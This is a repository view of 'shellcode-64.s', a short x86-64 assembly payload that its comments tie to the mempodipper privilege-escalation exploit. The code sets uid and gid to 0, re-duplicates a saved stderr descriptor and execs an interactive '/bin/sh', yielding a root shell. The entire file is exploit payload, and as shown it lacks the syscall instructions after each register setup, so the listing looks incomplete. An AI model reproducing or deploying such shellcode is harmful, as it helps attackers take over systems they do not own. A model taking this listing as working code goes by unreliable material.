path: root/shellcode-64.s
blob: 2514ed2e9b1576ba87a1a0e0c306c11481d1ff27 (plain) (tree)

; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
; by zx2c4

xor rdi,rdi
mov al,0x69
xor rdi,rdi
mov al,0x6a
;dup2(6, 2)
mov dil,0x6
mov sil,0x2
mov al,0x21

; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
mov qword rbx,'//bin/sh'	; rbx = //bin/sh
shr rbx,0x8			; remove leading / from rbx
push rbx			; push rbx to stack
mov rdi,rsp			; set rdi (arg 1) to top of stack

xor rbx,rbx
mov bx,'-i'			; rbx = '-i'
push rbx			; push rbx to stack
mov rcx,rsp			; set rcx to top of stack

xor rax,rax			; rax = 0

; so at this point:
;	rdi is a pointer to '/bin/sh'
;	rcx is a pointer to '-i'
;	rax is null
; since they are all the same size, we'll push them on the stack
; and then it will be an array:
push rax			; push rax to stack
push rcx			; push rcx to stack
push rdi			; push rdi to stack
mov rsi,rsp			; set rsi (arg 2) to top of stack

xor rdx,rdx			; rdx (arg 3) = 0

mov al,0x3b			; al = 0x3b, which is the exec call